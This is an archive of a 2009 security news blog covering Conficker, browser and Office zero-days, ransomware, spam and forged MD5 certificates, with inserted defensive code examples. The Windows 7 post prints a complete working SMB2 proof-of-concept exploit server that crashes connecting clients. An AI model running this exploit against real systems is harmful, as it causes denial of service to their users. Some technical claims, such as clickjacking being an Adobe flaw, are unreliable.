Monday, 30 November 2009

Conficker attacks major Indian admission test

According to some major reports, the Conficker attack caused huge chaos and resulted in the cancellation of India's major MBA admission test, CAT (Common Admission Test).
The computers are said to have been infected with the Conficker and W32/Nimda viruses.

The test centres were shut because of the infection, which caused huge disruption to the large number of students sitting the test. This event clearly shows a lack of cyber security awareness in the IT team. Since Conficker exploits MS08-067, the affected systems were clearly not updated with the latest Microsoft patches.
This incident is a clear example of how ignoring cyber security can affect established infrastructure.

Monday, 23 November 2009

IE 7 "getElementsByTagName()" Vulnerability

Symantec has confirmed an IE zero-day exploit for versions 6 and 7. This attack can be used to compromise the vulnerable system. The issue is in the Microsoft HTML Viewer (mshtml.dll): when retrieving certain CSS it could crash the browser or execute attacker-supplied shellcode, giving the attacker access to the system.

The exploit code can be found here. The workaround for this vulnerability is to update Microsoft Internet Explorer to version 8 or to follow this mitigation technique.

Sunday, 15 November 2009

Zero day Vulnerability in Windows 7

It is not very long since the Windows 7 operating system was released, and we already have a Microsoft-confirmed zero-day vulnerability.
This was first reported by a security researcher. The bug is in the SMB (Server Message Block) protocol used for network file and print sharing services. When exploited, the vulnerability can result in a total lockdown of the system, and a restart is required to regain control of it.
Laurent Gaffié, the researcher who discovered this flaw, says that the exploit can be launched successfully from a compromised computer within a network, or via Internet Explorer, by building a rogue packet.

The full proof-of-concept exploit code was published on Full Disclosure.
***********************************************************************************
#Author: Laurent Gaffié
#

import SocketServer

# Crafted SMB2 NEGOTIATE response returned to any client that connects.
# The NetBIOS length field claims 0x9a bytes while the SMB2 payload that
# follows is 0x9e bytes long (see the author's own note on the first line).
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445
launch.serve_forever()
*************************************************************************************
Microsoft is yet to provide a patch for this, so all users are recommended to block TCP ports 445 and 139 unless they are really necessary.
Only the Windows 7 and Windows Server 2008 operating systems are affected by this.
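The proof of concept above works because the receiving end trusts the length fields in the packet without checking them against the bytes it actually received. The following is an added example, not part of the original post or of the researcher's code: a small validator that cross-checks the NetBIOS session length, the SMB2 header size and the NEGOTIATE response's security-buffer offset and length. Run on the packet above (the bytes are copied from the PoC), it reports exactly the inconsistency the author noted in his comment (0x9a declared, 0x9e present); on a frame with the corrected length it reports nothing. The field layout follows the published SMB2 header and NEGOTIATE response formats; the constant names are this example's own.

```python
import struct

# The crafted SMB2 NEGOTIATE response from the proof of concept above (bytes
# copied from the page). Its NetBIOS length field claims 0x9a (154) bytes while
# 0x9e (158) bytes of SMB2 payload actually follow.
POC_FRAME = (
    b"\x00\x00\x00\x9a"
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64                     # fixed SMB2 header size
SMB2_NEGOTIATE = 0x0000                  # Command value of NEGOTIATE
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # set on responses
NEGOTIATE_RESPONSE_SIZE = 65             # StructureSize of a NEGOTIATE response


def check_smb2_frame(frame):
    """Cross-check every length field of a NetBIOS-framed SMB2 message.

    Returns a list of findings (strings). An empty list means the declared
    lengths agree with the bytes actually present, which is the condition a
    receiver must establish before trusting any offset inside the message.
    """
    findings = []
    if len(frame) < 4:
        return ["frame shorter than the 4-byte NetBIOS session header"]

    # NetBIOS session header: 1 byte message type, 3-byte big-endian length.
    declared = int.from_bytes(frame[1:4], "big")
    payload = frame[4:]
    if declared != len(payload):
        findings.append("NetBIOS length %d (0x%x) != payload length %d (0x%x)"
                        % (declared, declared, len(payload), len(payload)))

    if len(payload) < SMB2_HEADER_LEN or payload[:4] != SMB2_MAGIC:
        findings.append("payload does not hold a complete SMB2 header")
        return findings

    # SMB2 header after the 4-byte ProtocolId: StructureSize, CreditCharge,
    # Status, Command, CreditRequest/Response, Flags (all little-endian).
    struct_size, _credit_charge, _status, command, _credits, flags = \
        struct.unpack_from("<HHIHHI", payload, 4)
    if struct_size != SMB2_HEADER_LEN:
        findings.append("SMB2 header StructureSize %d != %d" % (struct_size, SMB2_HEADER_LEN))

    if command == SMB2_NEGOTIATE and flags & SMB2_FLAGS_SERVER_TO_REDIR:
        body = payload[SMB2_HEADER_LEN:]
        # NEGOTIATE response layout: StructureSize(2) SecurityMode(2)
        # DialectRevision(2) Reserved(2) ServerGuid(16) Capabilities(4)
        # MaxTransactSize(4) MaxReadSize(4) MaxWriteSize(4) SystemTime(8)
        # ServerStartTime(8) SecurityBufferOffset(2) SecurityBufferLength(2)
        if len(body) < 60:
            findings.append("NEGOTIATE response body truncated (%d bytes)" % len(body))
            return findings
        body_size = struct.unpack_from("<H", body, 0)[0]
        if body_size != NEGOTIATE_RESPONSE_SIZE:
            findings.append("NEGOTIATE StructureSize %d != %d" % (body_size, NEGOTIATE_RESPONSE_SIZE))
        sec_off, sec_len = struct.unpack_from("<HH", body, 56)
        # SecurityBufferOffset is relative to the start of the SMB2 header.
        if sec_off + sec_len > len(payload):
            findings.append("security buffer (offset %d, length %d) runs past the %d-byte payload"
                            % (sec_off, sec_len, len(payload)))
    return findings


if __name__ == "__main__":
    for label, frame in (("PoC frame", POC_FRAME),
                         ("corrected frame", b"\x00\x00\x00\x9e" + POC_FRAME[4:])):
        print(label, "->", check_smb2_frame(frame) or "consistent")
```

The same pattern (declared length versus bytes received, every offset bounded by the buffer) is the check a network IDS rule or a hardened client would apply before parsing further; the PoC's single inconsistent field is all that distinguishes it from a well-formed negotiate response.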

Tuesday, 29 September 2009

Microsoft AntiVirus Tool


I blogged about the initial beta release of Microsoft's free antivirus back in June. Now Microsoft is providing the full version of the antivirus, which can be found here.
I haven't tried and tested it. With the release of a free AV, Microsoft has joined other vendors like Avira and Avast. We should look at this initiative by Microsoft, from the security point of view, as a significant step, and I would suggest Microsoft install it by default on all PCs sold with a Microsoft OS. This is because there are an awful lot of users who don't bother to install antivirus and fall prey to malware/botnets, infecting their communities. Microsoft being a major player in the OS market will definitely help many more users install antivirus (especially in developing economies: China, Brazil, India and Russia).
I hope this will have a positive effect on the computer security community.

Saturday, 26 September 2009

File Encryptor (Ransomware)

The GPCode virus is ransomware. Unlike other viruses, this malware encrypts all files with the DOC, TXT, PDF, XLS, JPG, PNG, CPP and H extensions using the standard RSA algorithm with a 1024-bit key.

As this malware uses a 1024-bit key, it is difficult for reverse engineers to crack the encryption (not impossible though :-) ). GPCode uses public-key cryptography: the malware encrypts all the files with the public key, and they can only be decrypted with the private key, which is held by the malware author.
According to the above security analysis, after encryption the malware changes the file extension to '._CRYPT' and deletes the original file. After encrypting all the files, the malware displays the message shown in the picture above. The scammers have provided an email address and demand that the user contact them to decrypt the files.

So, users, be careful not to click links in unsolicited messages or on dodgy websites. Have a great weekend.



Thursday, 27 August 2009

Malware disguised as Snow Leopard

According to this report, malware writers are phishing users into downloading malware posing as the newest free version of Mac OS, Snow Leopard.
The malware may change your DNS configuration and download additional malicious scripts. Users are redirected to phishing and FakeAV (bogus antivirus application) sites.
Mac users, please download your latest updates only from the legitimate Apple site.

Sunday, 23 August 2009

Induc Virus


Induc is a file infector virus. It doesn't infect EXEs; instead it checks whether Delphi (versions 4.0 to 7.0) is installed on the machine.
If a Delphi installation is found, it copies SysConst.pas (the source program; .pas = Pascal) to the \Lib folder and overwrites its code. It renames the original %DelphiRootDir%\lib\sysconst.dcu (.dcu = Delphi compiled unit, i.e. Delphi compiled code) to SysConst.bak. It then compiles the modified sysconst.pas to produce an infected copy of the sysconst.dcu file and deletes the modified version of sysconst.pas, thereby infecting every Delphi program subsequently compiled on this computer. [1],[2]

Thursday, 23 July 2009

Adobe Flash Zero Day

July seems to be a very busy month for security folks and malware authors; we have already seen three zero-day exploits: Microsoft ActiveX Control, MS Office Web Components and Firefox 3.5. In addition to this list, we are seeing a new zero-day vulnerability exploiting Adobe Flash.

This is an unpatched Adobe Flash Player vulnerability being exploited in the wild.
According to this report, Adobe PDF Reader's ability to support SWF components is misused to spread this exploit by fooling users into opening a PDF with an embedded malicious SWF (Flash) file.

According to this analysis, a sample of the PDF malware crashes when run and drops an executable (Suchost.exe) embedded inside the PDF. It also tries to connect to a remote server by doing a dynamic IP lookup.
The dropped EXE adds itself to the startup list (programs which run when your computer starts) and further drops a malicious SYS and DLL file.
Unfortunately the major AV vendors have poor detection of it. So, dear readers, please don't open any untrusted PDFs or Flash files.

Wednesday, 22 July 2009

Mystical Cloud


I'm talking about cloud computing, SaaS (software as a service), hybrid cloud etc. I was reading an article about cloud computing. Cloud or SaaS is a software service offered over the web or a public network. The best example of the cloud at the moment is Google Apps (like Google Docs).

From the security perspective, cloud security and DLP (Data Loss/Leakage Prevention) are the latest buzz in the industry. All the vendors are investing and trying to conquer these markets by coming up with new products. DLP by itself, like the cloud, is a very wide topic which involves cryptography.

Benefits?

There are lots of benefits in cloud computing: users just need to have broadband, and the rest is handled by the cloud service provider. Users don't have to worry about installing different applications or maintaining them. (I would expect a day in the future where users only have a browser on their machine and all the other services, including most of the operating system's functionality, are moved to the cloud or the core functionality is embedded within the browser.)

Concerns?

Security would be the major concern, because you will be fully trusting an unknown (or known but not guaranteed) service provider. You will be storing all your documents and company information, trusting the infrastructure and security of the service provider. The service provider may at some point sell your data to a third party without consent, or there may be a breach in their security.

Computer security in the cloud is also a major concern, as present-day malware in the form of Trojans, viruses or worms may evolve to target more browsers or use exploits in mass volume rather than targeting individual users, and there could also be a botnet operating in the clouds!!

Like every technology, cloud computing has pros and cons; the security industry should work together and plan properly to thwart any security loopholes before embracing it with both hands.

Wednesday, 8 July 2009

New MyDoom Variant

Don't be scared, it's not confirmed yet. For those of you who don't know what MyDoom is: there was a nasty mass-mailing worm, MyDoom, back in 2004. According to this post, they reckon that this is a new variant of the MyDoom worm.
This worm is said to have caused a large DDoS (distributed denial of service) attack on US and Korean websites.

Thursday, 25 June 2009

Microsoft Free AntiVirus

Microsoft has started a free AV (antivirus) service. This service is available only in a few countries in the world. At the moment China, Brazil, Israel and the USA are the only countries where it is available.
It looks like Microsoft is trying to conquer the AV market with free software; we should wait and see the reaction of the other AV vendors.

Saturday, 6 June 2009

PhD in 10 Days

On Saturday morning, when I was checking my emails, I saw that my Gmail spam folder was filled with loads of messages.
I took a peek into some of the messages, which said "Bachelor/PhD..." in 10 days and also claimed that you need not study or go to university, blah blah. What's the use of getting such a degree? Here's a snippet of the message:
--------------------------------------------------------------------------
It's now possible to earn affordable Bache1or, Master or Doctorate Degrees!

No Studies
No Attendance
No Waiting
No Examinations
No Hefty Fee

Earn a recognized UniversityDegree based on work or life experience from University within 10 days!
Get your desired degree on the basis of your Prior Knowledge and Life Experience.

1-XXX-XXXX-740 [Inside USA]
+1-XXX-XXXX-740 [Outside USA]

No Experience? No Problem!

On the basis of what you already know, you can now qualify for a degree that is accepted and recognized worldwide for as little as couple hundred.

DOES THIS SOUND LIKE YOU?

* You have more experience yet your colleague gets promoted?
* Many companies where you apply for a job don't give you a call as you lack the basic education they require?
* You struggle in relationships, as 'she' thinks you don't have a promising future?

HERE's YOUR WAY OUT:
It is now possible to earn an accredited degree on the basis of work and life experience you already have and receive your degree in just 10 days!

PLEASE CALL TODAY:
1-XXX-XXXX-740 [Inside USA]
+1-XXX-XXXX-740 [Outside USA]

Please tell us your:
a) your name
b) your Country
c) phone number with CountryCode if outside U.S.A.

We will get back to you in next working day
----------------------------------------------------------------------------------
Google's spam system was smart enough to block them. You can easily spot the typos, and a quick Google search of the telephone numbers tells you that they are premium numbers used by scammers to make money, so don't get fooled in an ambition to get a fake degree.

As I went further through my emails, there were still local sexy singles waiting for me and a Canadian doctor wooing me to buy Viagra.... Oops, the nastiness of spam. So stay away from it: don't open anything in your bulk/spam folder (or run any attachments) unless you are sure it's from a legitimate source.

Friday, 22 May 2009

Gumblar

US-CERT has warned about a multistage malware exploit. Chinese-domain-based malware called 'Gumblar' at the first stage infects websites using obfuscated JavaScript. The websites are infected using stolen FTP credentials.
Visitors to these infected websites are then exploited through unpatched PDF and Flash vulnerabilities.
Users are therefore urged to update their software and keep their antivirus up to date.

Thursday, 14 May 2009

Two Factor Card Authentication Technology in beta

A two-factor payment card authentication system has been successfully integrated into a plastic payment card.
The EMUE-developed card has a 12-button keypad and an LCD display. The keypad is used to enter a PIN, upon which the card generates a one-time passcode used for authentication purposes.
We can also note that there was a similar system developed by RSA called SecurID.
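The post does not say which algorithm the EMUE card or SecurID uses to turn a PIN press into a passcode, so the following is an added example, not the card's or RSA's code: the generic event-based one-time password scheme, HOTP from RFC 4226, with a hypothetical model of the token side (the PIN unlocks the display, each press advances a counter) and the issuer side (shared secret, a look-ahead window for presses that were never submitted, and rejection of any code at or below the last accepted counter, i.e. a replay). The shared secret is the RFC's own test secret, so the codes match its published vectors.

```python
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6):
    """HOTP as specified in RFC 4226: HMAC-SHA1 over the 8-byte big-endian
    counter, then 'dynamic truncation' to a 31-bit integer reduced mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


class Card:
    """Token side (hypothetical model of the keypad card, not the vendor's
    design): the PIN unlocks code generation and every press advances the
    counter, so no code is ever shown twice."""

    def __init__(self, secret, pin):
        self._secret = secret
        self._pin = pin
        self._counter = 0

    def press(self, pin):
        if not hmac.compare_digest(pin, self._pin):
            return None                  # wrong PIN: the display stays blank
        code = hotp(self._secret, self._counter)
        self._counter += 1
        return code


class Verifier:
    """Issuer side: shares the secret, remembers the lowest counter still
    acceptable and accepts a short look-ahead window so that a press that was
    never submitted does not desynchronise the card."""

    def __init__(self, secret, look_ahead=5):
        self._secret = secret
        self._next = 0
        self._look_ahead = look_ahead

    def verify(self, code):
        for counter in range(self._next, self._next + self._look_ahead):
            if hmac.compare_digest(hotp(self._secret, counter), code):
                self._next = counter + 1   # everything at or below is now a replay
                return True
        return False


def demo_session(secret=b"12345678901234567890", pin="1234"):
    """Walk through a card/issuer session; returns the issuer's decisions.
    The default secret is the RFC 4226 test secret (constructed input)."""
    card, issuer = Card(secret, pin), Verifier(secret)
    first = card.press(pin)              # counter 0 -> "755224"
    skipped = card.press(pin)            # counter 1, pressed but never submitted
    third = card.press(pin)              # counter 2 -> "359152"
    return [
        issuer.verify(first),            # True
        issuer.verify(first),            # False: replay of an accepted code
        issuer.verify(third),            # True: counter 2 is inside the window
        issuer.verify(skipped),          # False: counter 1 is now behind
    ]


if __name__ == "__main__":
    print(demo_session())
```

The two properties worth noticing are that a code is useless without the card (the secret never leaves it and the PIN gates the display, which is what makes this a second factor) and that the issuer's counter only moves forward, so an intercepted code cannot be presented again.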

Thursday, 7 May 2009

Bootkit, will this supersede Rootkit ?

A bootkit (or VBootkit) is a kind of rootkit that can load from the boot sector. Indian security researchers released the code for VBootkit; they claim that it can be used to compromise security on Windows Vista and Windows 7. According to this, VBootkit could also potentially be misused to develop boot sector viruses.
But Microsoft says that it is not a vulnerability but a design flaw which is exploited by VBootkit, and that it is not a threat to the OS (it can be circumvented using BitLocker).

Tuesday, 5 May 2009

Critical Vulnerability in Adobe 9.1

According to this post, a critical vulnerability has been identified in Adobe Reader and Acrobat 9.1 and earlier versions. This vulnerability could allow an attacker to take control of the system.
All users are advised to disable the JavaScript function in their Adobe application.
Seeing all the recent vulnerabilities in Acrobat, Adobe must be wondering whether they were right to provide JavaScript functionality in Reader.

When Dot disappeared

This is a good example of how small mistakes may lead to security blunders. Microsoft posted some updates related to Vista SP2. The link in the post was actually missing a dot: instead of pointing to technet.microsoft.com it pointed to technetmicrosoft.com. Though this domain was not malicious, it could have done serious damage if it had been. Microsoft rectified this immediately.

Sunday, 26 April 2009

End of Conficker on May 5th

According to this article, Conficker will self-destruct on May 5th.

Wednesday, 22 April 2009

Bogus waiter

I was too lazy to write the blog these days.
If you are bored of reading security jargon, here's a change (though related to physical security).
A man posed as a waiter and took about $186. The man walked into restaurants and diners disguised as a waiter and collected money. The modern-day world is still vulnerable to basic tricks.

Saturday, 4 April 2009

Microsoft Powerpoint vulnerability

There is a new Microsoft PowerPoint vulnerability. The vulnerability is rated as critical; it could allow remote code execution on the victim's machine. I blogged about the zero-day Excel flaw, and to add to that there is now a new PowerPoint vulnerability. Microsoft may come up with patches; in the meantime users are alerted not to open files from untrusted sources and to keep their antivirus software updated.

What is Conficker-C waiting for ?

I wrote in my previous post that Conficker may be fooling around. To update that: so far we have not seen any major havoc from Conficker C. The Conficker authors may upload their payload at any time to one of the 50,000 domains in the list (though only 500 domains are contacted per day). Security researchers are not sure when Conficker would update itself (because of server-side polymorphism). Maybe the Conficker authors are trying to spring a surprise, or are waiting for security researchers and the media to concentrate on different stuff!!!

Saturday, 21 March 2009

Is Conficker C trying to (April) Fool us ?

Recently I wrote about the new Conficker variant.
By the time the security industry was jubilant about fighting it, there was a new variant, Conficker C, which is waiting to trigger itself on April 1 according to this paper. This is an excellent paper on the analysis of Conficker C.

A notable aspect of this variant is its use of cutting-edge computer technologies. Conficker C uses the MD6 algorithm (a buffer-overflow-exploitable version of it was also used in the B variant), new DLL patching techniques and the P2P (peer-to-peer) protocol for updating its binary.

Monday, 9 March 2009

New Conficker Variant

I blogged about Conficker a few days back. Conficker exploits a Microsoft vulnerability. Initially it was successful in creating massive damage to industry and infected a large number of machines. The AV industry initially struggled to clean this malware but was later successful in tracking its workings and was able to clear it up. To escalate the cold war between AV and malware authors, there's a new variant of Conficker. We'll have to wait and see how the AV industry responds to this.

Tuesday, 24 February 2009

Zero Day Vulnerability in Microsoft Excel

Microsoft has released an advisory about a vulnerability in Microsoft Excel. This vulnerability could allow remote code execution.
A malicious Excel file could be sent through email (spam) or crafted to be downloaded from a remote server. When the user opens the file, there could be arbitrary code execution (usually shellcode) with the same privileges as the user.

Computer users are advised not to open any emails/PDFs (there was a recent vulnerability in Adobe PDF) from untrusted sources.

Sunday, 15 February 2009

Twitter and ClickJacking

In an interesting development, the microblogging website Twitter was made to broadcast messages due to a clickjacking flaw.
Clickjacking is a vulnerability in an Adobe product which dupes users into clicking on internet URLs. The user may assume that he is clicking the Google (or any other benign) link, but he is redirected to a money-transferring or Viagra pharmacy webpage.

Thursday, 5 February 2009

Parking Ticket used for Social Engineering

Bad guys are said to have come up with a new social engineering trick to lure users into visiting their malicious websites.
Parking tickets with false parking violations are believed to have been found on vehicles with the following message:

PARKING VIOLATION This vehicle is in violation of standard parking regulations. To view pictures with information about your parking preferences, go to [website-redacted]

People visiting the website have browser helper objects (BHOs) installed on their machines and are pushed into using fake-AV software.

Friday, 23 January 2009

New Trojan for Mac

Macs were away from malware for quite a while. But to increase the necessity for Mac security (or to increase the security market for Macs), a new Mac Trojan was reported. The Trojan was first reported by Intego. It was found in pirated Apple iWork 09 (the equivalent of Microsoft Office). This version of iWork 09 is said to contain a Trojanized package called iWorkServices.pkg which is installed alongside the iWork software. This package runs itself as a service and attempts to connect to a remote server. Mac users are alerted not to download this version and to update their antivirus software with the latest virus definitions.

Saturday, 17 January 2009

"Conficker" Latest Worm in the cyber town

At the time I was writing this blog, the Conficker worm, also known as 'Downadup', was spreading very fast. According to a blog post by the security firm F-Secure, it is said to have infected 8.9 million machines.
This worm is said to exploit the Microsoft Windows Server service vulnerability.
According to this article, the worm also tries to spread by searching for shared computers with weak passwords, removable drives and computers without the latest security updates.
It has caused havoc to cyber business after the Storm worm. The worm is said to have infected many banks and popular IT firms across the world. The AV vendors are still working hard to find disinfection and cleanup for this worm. Firms and users are advised to update themselves with the latest security updates and patches.

Friday, 2 January 2009

Forged SSL certificates

Researchers Molnar, Appelbaum and Sotirov were able to successfully create a rogue CA (certificate authority). They picked the CAs which are still using crappy MD5 for their certificates. They were able to pass off their rogue certificate as the legitimate one because the MD5 hash values of both certificates were the same (a flaw in MD5 due to collisions).
This can be used by malware authors to create fake digital certificates, which has been seen in recent malware attacks. They can impersonate bank websites and fool users in phishing attacks.
The solution to this problem is to use SHA instead of MD5.
Though this is very good research work, it is not a great security threat, as SSL at the browser end is only certification and there are so many legitimate websites with bad certificates. Normally people ignore the warnings displayed by the browsers.

As we know, data is often stored at endpoints rather than on the network, so creating a rogue CA certificate is not of great security risk.
At least in 2009 we should stop using MD5 and switch to SHA....

Happy New year to all, Wishing for a secure and safe web :-)
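The practical check that follows from this post is to look at the signatureAlgorithm field of the certificates a site or CA actually issues and flag MD5. As an added example (not the researchers' code and not from the original post), the block below decodes just enough DER to walk the outer X.509 structure (Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }) and classify the algorithm OID. The certificates it is run on are constructed stand-ins: the outer structure and the AlgorithmIdentifier are real, but the tbsCertificate is a placeholder and the signature is dummy bytes; the same function applies unchanged to a real DER certificate exported from a browser. The verdict labels are this example's own, and they go beyond the post in one respect: SHA-1, the post's recommended replacement in 2009, has since been retired for certificate signatures as well, so it is marked deprecated.

```python
# Minimal DER helpers: enough to walk the outer structure of an X.509
# certificate and read its signatureAlgorithm.

def der_tlv(tag, content):
    """Encode one DER element; short form and two long-form lengths cover certificates."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + content


def der_read(buf, pos=0):
    """Decode the element at buf[pos:]; returns (tag, content, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), pos + 2 + n
    return tag, buf[pos:pos + length], pos + length


def oid_encode(dotted):
    """Dotted OID -> OBJECT IDENTIFIER content bytes (first two arcs packed, base-128 after)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def oid_decode(content):
    """OBJECT IDENTIFIER content bytes -> dotted string."""
    arcs, value = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


# PKCS #1 signature OIDs and how a current validator should treat them
# (the verdict labels are this example's own).
SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.4":  ("md5WithRSAEncryption", "broken"),      # collisions: the rogue-CA result
    "1.2.840.113549.1.1.5":  ("sha1WithRSAEncryption", "deprecated"), # the 2009 fix, itself retired since
    "1.2.840.113549.1.1.11": ("sha256WithRSAEncryption", "ok"),
}


def signature_algorithm(cert_der):
    """Return (oid, name, verdict) for a DER certificate's signatureAlgorithm.

    Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }
    signatureAlgorithm ::= SEQUENCE { algorithm OID, parameters ANY OPTIONAL }
    """
    tag, cert, _ = der_read(cert_der)
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    _, _tbs, pos = der_read(cert)            # skip tbsCertificate
    tag, alg, _ = der_read(cert, pos)        # signatureAlgorithm
    if tag != 0x30:
        raise ValueError("signatureAlgorithm is not a SEQUENCE")
    tag, oid_bytes, _ = der_read(alg)
    if tag != 0x06:
        raise ValueError("algorithm is not an OBJECT IDENTIFIER")
    oid = oid_decode(oid_bytes)
    name, verdict = SIGNATURE_OIDS.get(oid, ("unknown", "unknown"))
    return oid, name, verdict


def skeletal_cert(sig_oid):
    """Constructed stand-in certificate: correct outer structure, but the
    tbsCertificate is a placeholder (a real one carries version, serial,
    issuer, validity, subject and public key) and the signature is dummy bytes."""
    tbs = der_tlv(0x30, der_tlv(0x02, b"\x01"))
    alg = der_tlv(0x30, der_tlv(0x06, oid_encode(sig_oid)) + der_tlv(0x05, b""))
    sig = der_tlv(0x03, b"\x00" + b"\xab" * 128)   # 0 unused bits + 1024-bit dummy value
    return der_tlv(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in SIGNATURE_OIDS:
        print(signature_algorithm(skeletal_cert(oid)))
```

Reading the field out of the certificate rather than trusting a vendor's summary matters here because the rogue-CA attack does not touch the public key or the subject: the only thing that reveals the weakness is the digest named in the AlgorithmIdentifier.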